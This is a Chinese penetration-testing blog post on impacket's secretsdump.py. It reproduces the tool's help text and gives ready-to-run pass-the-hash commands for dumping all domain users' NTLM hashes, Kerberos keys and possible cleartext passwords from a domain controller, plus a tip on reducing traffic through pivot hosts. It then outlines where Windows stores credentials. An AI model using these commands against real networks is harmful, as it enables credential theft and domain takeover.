layout | title | date | tags | categories | author |
---|---|---|---|---|---|
post |
Windows hash dump之secretsdump |
2019-07-16 16:30:00 -0700 |
域渗透 |
hack |
PythonPig |
- content {:toc}
在域渗透的时候经常使用impacket的secretsdump.py来获取域内主机甚至域控上的hash值,secretsdump可以通过多种方法获取{sam, secrets, cached and ntds}中保存的用户凭证。
{:refdef: style="text-align: center;"} {: refdef}
图片来源于http://blog.extremehacking.org/blog/2017/06/19/make-hashdump-module-work-windows-10-sam-mode/
今天并不讲secretsdump.py的实现方法,也许某天不忙的时候会分析一下其具体实现细节。今天主要借助secretsdump.py了解一下用户凭证在windows系统中是如何存储的。
本文的主要内容:
1、secretsdump.py的使用
2、用户凭证在windows系统如何存储
直接查看帮助是便捷且有效的方法
secretsdump.py -h:
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
usage: secretsdump.py [-h] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
[-security SECURITY] [-sam SAM] [-ntds NTDS]
[-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
[-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
[-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
[-pwd-last-set] [-user-status] [-history]
[-hashes LMHASH:NTHASH] [-no-pass] [-k]
[-aesKey hex key] [-dc-ip ip address]
[-target-ip ip address]
target
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
or LOCAL (if you want to parse local files)
optional arguments:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-system SYSTEM SYSTEM hive to parse
-bootkey BOOTKEY bootkey for SYSTEM hive
-security SECURITY SECURITY hive to parse
-sam SAM SAM hive to parse
-ntds NTDS NTDS.DIT file to parse
-resumefile RESUMEFILE
resume file name to resume NTDS.DIT session dump (only
available to DRSUAPI approach). This file will also be
used to keep updating the session's state
-outputfile OUTPUTFILE
base output filename. Extensions will be added for
sam, secrets, cached and ntds
-use-vss Use the VSS method insead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using
-use-vss). Default: smbexec
display options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified.
Only available for DRSUAPI approach. Implies also
-just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos
keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account.
Doesn't apply to -outputfile data
-user-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from
ccache file (KRB5CCNAME) based on target parameters.
If valid credentials cannot be found, it will use the
ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256
bits)
connection:
-dc-ip ip address IP Address of the domain controller. If ommited it use
the domain part (FQDN) specified in the target
parameter
-target-ip ip address
IP Address of the target machine. If omitted it will
use whatever was specified as target. This is useful
when target is the NetBIOS name and you cannot resolve
it
基本使用方法:
python secretsdump.py domain/[email protected] -hashes LM HASH:NT HASH
secretsdump.py主要从SAM、LSA secrets(包括 cached creds)和域控的NTDS.dit(包括Supplemental Credentials,可能有明文密码)三处获取用户凭证,唯一的一点是不能dump LSASS进程在内存中的数据。
1、导出域内所有用户ntlm hash(通过预控上的ntds.dit数据库获取)
python secretsdump.py domain/[email protected] -hashes LM HASH:NT HASH -just-dc-ntlm -outputfile tmp
2、导出域内所有用户的ntlm hash、Kerberos keys和Domain Credentials(Supplemental Credentials,可能保存有明文密码,secretsdump生成的文件以cleartext为后缀)。-just-dc能导出用户明文密码(如果明文保存在Supplemental Credentials的话,-just-dc-ntlm只能导出lm hash和nt hash)
python secretsdump.py domain/[email protected] -hashes LM HASH:NT HASH -just-dc -outputfile tmp
3、secretsdump.py会把结果打印到标准输出,而渗透过程中可能会经过多个跳板机在内网运行secretsdump,这样可能产生额外流量,为了避免这种情况,可以把输出定向到/dev/null。
python secretsdump.py domain/[email protected] -hashes LM HASH:NT HASH -just-dc-ntlm -outputfile tmp >/dev/null
根据微软官网的介绍,用户凭证一般存储在SAM、LSA secrets、NTDS.DIT和LSASS进程的内存中,另外系统缓存中也有可能存在用户凭证,参见:
Cached Domain Credentials
Interactive logon: Number of previous logons to cache (in case domain controller is not available)
secretsdump可以从SAM、LSA secrets(包括 cached creds)和域控的NTDS.dit获取用户凭证,LSASS进程的内存数据通过绕过杀软导出域内用户hash的方法记录获取。